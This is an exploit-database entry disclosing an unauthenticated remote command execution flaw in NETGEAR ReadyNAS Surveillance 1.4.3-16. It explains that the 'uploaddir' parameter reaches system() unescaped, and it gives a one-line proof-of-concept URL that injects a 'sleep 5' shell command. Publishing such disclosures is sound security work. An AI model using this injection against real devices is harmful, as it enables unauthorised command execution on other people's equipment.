NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution

EDB-ID: 42956
Author: Kacper Szurek
Published: 2017-09-27
CVE: N/A
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # Date: 27.09.2017 
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote

1. Description

$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.

https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html

2. Proof of Concept

http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27

Related Posts